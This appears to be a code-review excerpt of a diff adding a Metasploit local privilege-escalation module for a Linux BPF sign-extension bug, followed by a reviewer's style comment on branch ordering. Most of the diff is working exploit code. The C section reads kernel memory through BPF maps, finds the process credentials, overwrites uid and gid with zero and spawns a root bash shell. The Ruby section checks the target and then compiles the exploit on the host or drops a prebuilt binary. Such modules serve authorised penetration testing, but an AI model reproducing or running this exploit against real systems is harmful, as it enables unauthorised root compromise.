modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb

```diff
@@ -0,0 +1,388 @@
+                  fprintf(stderr, "short write: %lu\n", n);
+      }
+
+      #define __update_elem(a, b, c) \
+            bpf_update_elem(0, (a)); \
+            bpf_update_elem(1, (b)); \
+            bpf_update_elem(2, (c)); \
+            writemsg();
+
+      static uint64_t get_value(int key) {
+            uint64_t value;
+
+            if (bpf_lookup_elem(&key, &value))
+                  __exit(strerror(errno));
+
+            return value;
+      }
+
+      static uint64_t __get_fp(void) {
+            __update_elem(1, 0, 0);
+
+            return get_value(2);
+      }
+
+      static uint64_t __read(uint64_t addr) {
+            __update_elem(0, addr, 0);
+
+            return get_value(2);
+      }
+
+      static void __write(uint64_t addr, uint64_t val) {
+            __update_elem(2, addr, val);
+      }
+
+      static uint64_t get_sp(uint64_t addr) {
+            return addr & ~(0x4000 - 1);
+      }
+
+      static void pwn(void) {
+            uint64_t fp, sp, task_struct, credptr, uidptr;
+
+            fp = __get_fp();
+            if (fp < PHYS_OFFSET)
+                  __exit("bogus fp");
+
+            sp = get_sp(fp);
+            if (sp < PHYS_OFFSET)
+                  __exit("bogus sp");
+
+            task_struct = __read(sp);
+
+            if (task_struct < PHYS_OFFSET)
+                  __exit("bogus task ptr");
+
+            printf("task_struct = %lx\n", task_struct);
+
+            credptr = __read(task_struct + CRED_OFFSET); // cred
+
+            if (credptr < PHYS_OFFSET)
+                  __exit("bogus cred ptr");
+
+            uidptr = credptr + UID_OFFSET; // uid
+            if (uidptr < PHYS_OFFSET)
+                  __exit("bogus uid ptr");
+
+            printf("uidptr = %lx\n", uidptr);
+            __write(uidptr, 0); // set both uid and gid to 0
+
+            if (getuid() == 0) {
+                  printf("spawning root shell\n");
+                  system("/bin/bash");
+                  exit(0);
+            }
+
+            __exit("not vulnerable?");
+      }
+
+      int main(int argc, char **argv) {
+            prep();
+            pwn();
+
+            return 0;
+      }
+
+    }
+
+    filename = rand_text_alpha(8)
+    path = "#{datastore['WritableDir']}/#{filename}"
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    def check_gcc?()
+      gcc = cmd_exec('which gcc')
+      if gcc.include?('gcc')
+        vprint_good('gcc is installed')
+        return true
+      else
+        print_error('gcc is not installed.  Compiling will fail.')
+        return false
+      end
+    end
+
+    compile = false
+    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+      if check_gcc?()
+        compile = true
+        vprint_status('Live compiling exploit on system')
+      else
+        vprint_status('Dropping pre-compiled exploit on system')
+      end
+    end
+
+    if compile == false
```

Comment:
Generally want to follow the `true` branch first for conditionals with both `true` and `false` branches.